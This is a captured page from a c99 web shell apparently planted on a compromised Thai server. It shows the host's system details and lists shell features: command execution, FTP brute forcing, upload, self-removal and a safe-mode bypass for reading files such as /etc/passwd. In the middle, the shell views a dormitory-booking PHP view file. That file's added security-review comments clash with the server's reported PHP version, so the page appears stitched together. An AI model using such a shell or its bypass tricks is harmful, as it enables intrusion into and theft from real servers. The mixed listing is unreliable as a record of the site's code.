!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/esa/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_add_domitory.php (4.52 KB)      -rwxr-xr-x
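<?php
// View preamble: resolve the optional student row, open the booking form and
// capture the posted dmb_dm_id value for the inline script that follows.
// The separators between array elements and call arguments, and the `=` on the
// $tmp assignment, were missing from the listing; they are restored here so
// the file parses.

// $qu_std is optional: when the caller supplies it, row() provides the
// applicant's record; otherwise the view falls back to free-text inputs.
$row_std = isset($qu_std) ? $qu_std->row() : NULL;

$attributes = array('id' => 'myform', 'name' => 'myform');
echo form_open($this->config->item('sa_folder').$action.'/dmb_insert', $attributes);

// Raw request data: nothing in this view validates or escapes it, so every
// place that echoes $tmp has to escape it for the context it is written into.
$tmp = $this->input->post('dmb_dm_id');
?>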

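<script>
// Fill the room selector as soon as the DOM is ready.
jQuery(document).ready(function(){
    change_dm();
});

/**
 * Load the room selector for the dormitory chosen in #dmId, inject it into
 * #showDmRm, and re-select the previously posted room when there is one.
 */
function change_dm () {
    var dmId = jQuery("#dmId").val();
    // $tmp is unvalidated POST data. Echoing it between hand-written quotes let
    // a crafted value close the string literal (or the script element) and run
    // as script in the visitor's session. json_encode() emits a complete quoted
    // literal, and the JSON_HEX_* flags keep angle brackets, ampersands and both
    // quote characters out of the output. JSON_HEX_* requires PHP >= 5.3.
    // The full "<?php" tag also removes the dependency on short_open_tag.
    var tmp_rm = <?php echo json_encode((string) $tmp, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);?>;
    if(dmId!=""){
        var url = "<?php echo site_url($this->config->item('sa_folder'));?>/general/getDmRm/"+dmId;
        // Synchronous request (third argument false): the response is read
        // directly after send() returns.
        xmlhttp = newXmlHttp();
        xmlhttp.open("GET", url, false);
        xmlhttp.send(null);
        if (xmlhttp.readyState==4 && xmlhttp.status==200) {
            var ret_text = xmlhttp.responseText;
            // The response body is parsed as HTML, so the getDmRm endpoint must
            // escape every data value it embeds in the fragment it returns.
            document.getElementById('showDmRm').innerHTML= ret_text;
            if(tmp_rm!=''){
                jQuery("#dmb_dm_id").val(tmp_rm);
            }
        }
    }
}
</script>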
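<?php
// Dormitory booking form body. When $qu_dmb is set only a notice row is
// rendered; otherwise the form is shown, with read-only values plus hidden
// inputs when a student row ($row_std) is available and editable inputs when
// it is not.
// The argument separators and the `=` on the $js assignment were missing from
// the listing and are restored; the unclosed final <tr> is closed.
//
// NOTE(review): getval(), $tmId and $acY are written into HTML text and
// attribute values exactly as received. getval() is defined outside this view;
// confirm that it HTML-escapes its result (and that the controller supplies
// $tmId/$acY as trusted values), otherwise wrap each echo in htmlspecialchars()
// with ENT_QUOTES and the page's charset. The hidden inputs are also
// client-editable, so the dmb_insert handler should re-derive or re-validate
// them server-side rather than trust what is posted back.
?>
<table width="100%" border="0" align="center">
<?php if (isset($qu_dmb)) { ?>
    <tr align="center">
        <td>ท่านได้จองหอพัก/ห้องพักแล้ว</td>
    </tr>
<?php } else { ?>
    <tr align="center">
        <th>จองหอพัก/ห้องพัก<br /><br /></th>
    </tr>
    <tr>
        <td><table class="szone2" width="100%" border="0">
            <tr>
                <td width="25%" class="szone">ข้าพเจ้า</td>
                <td>
<?php if (is_null($row_std)) { ?>
                <?php echo form_dropdown('dmb_pf_id', $rs_pf);?>
                <input type="text" id="dmb_name" name="dmb_name" value="<?php echo set_value('dmb_name');?>" size="10" maxlength="30" class="required-thai" />
                <input type="text" id="dmb_surname" name="dmb_surname" value="<?php echo set_value('dmb_surname');?>" size="10" maxlength="30" class="required-thai" />
                <span class="error">*<?php echo form_error('dmb_pf_id') ? form_error('dmb_pf_id') : (form_error('dmb_name') ? form_error('dmb_name') : form_error('dmb_surname'));?></span>
<?php
} else {
    // Known student: show prefix, name and surname as text and carry the
    // identifiers along in hidden inputs.
    echo getval('prefixName', $row_std).getval('stdName', $row_std).' '.getval('stdSurname', $row_std);
?>
                <input type="hidden" id="dmb_std_id" name="dmb_std_id" value="<?php echo getval('stdId', $row_std);?>" />
                <input type="hidden" id="dmb_pf_id" name="dmb_pf_id" value="<?php echo getval('stdPfId', $row_std);?>" />
                <input type="hidden" id="dmb_name" name="dmb_name" value="<?php echo getval('stdName', $row_std);?>" />
                <input type="hidden" id="dmb_surname" name="dmb_surname" value="<?php echo getval('stdSurname', $row_std);?>" />
<?php } ?>
                </td>
                <td class="szone">เลขที่บัตรประชาชน</td>
                <td>
<?php if (is_null($row_std)) { ?>
                <input type="text" id="dmb_citizen_id" name="dmb_citizen_id" value="<?php echo set_value('dmb_citizen_id');?>" size="13" maxlength="13" class="required-int" />
                <span class="error">* <?php echo form_error('dmb_citizen_id');?></span>
<?php
} else {
    // The citizen id is printed as text and repeated in a hidden input.
    echo getval('sdtCitizenId', $row_std);
?>
                <input type="hidden" id="dmb_citizen_id" name="dmb_citizen_id" value="<?php echo getval('sdtCitizenId', $row_std);?>" />
<?php } ?>
                </td>
            </tr>
            <tr>
                <td class="szone">หลักสูตร</td>
                <td colspan="3">
<?php
if (is_null($row_std)) {
    echo form_dropdown('dmb_cur_id', $rs_cur);
?>
                <span class="error">* <?php echo form_error('dmb_cur_id');?></span>
<?php
} else {
    echo getval('curName', $row_std);
?>
                <input type="hidden" id="dmb_cur_id" name="dmb_cur_id" value="<?php echo getval('stdCurId', $row_std);?>" />
<?php } ?>
                </td>
            </tr>
            <tr>
                <td class="szone">มีความประสงค์จะจองหอพัก</td>
                <td colspan="3">
<?php
// Extra attributes for the dormitory <select>: the id that change_dm() reads
// and the onChange hook that reloads the room list.
$js = "id=\"dmId\" onChange=\"change_dm()\"";
echo form_dropdown('dftDmId', $rs_dm, setValue('dftDmId', $row_std), $js);
?>
                <span class="error">* <?php echo form_error('dftDmId');?></span></td>
            </tr>
            <tr>
                <td class="szone">ห้องพัก</td>
                <td colspan="3"><div id="showDmRm"></div>
                <span class="error"><?php echo form_error('dmb_dm_id');?></span></td>
            </tr>
            <tr>
                <td class="szone">ภาค/ปีการศึกษา</td>
                <td colspan="3"><?php echo $tmId;?>/<?php echo $acY;?>
                <input type="hidden" id="dmb_year" name="dmb_year" value="<?php echo $acY;?>" />
                <input type="hidden" id="dmb_tm_id" name="dmb_tm_id" value="<?php echo $tmId;?>" /></td>
            </tr>
            <tr>
                <td colspan="4" align="center">
                <input type="submit" name="add" id="add" value="บันทึก" />
                <input type="reset" name="clear" id="clear" value="เคียร์ข้อมูล" /></td>
            </tr>
        </table></td>
    </tr>
<?php } ?>
</table>
<?php echo form_close();?>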

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0109 ]--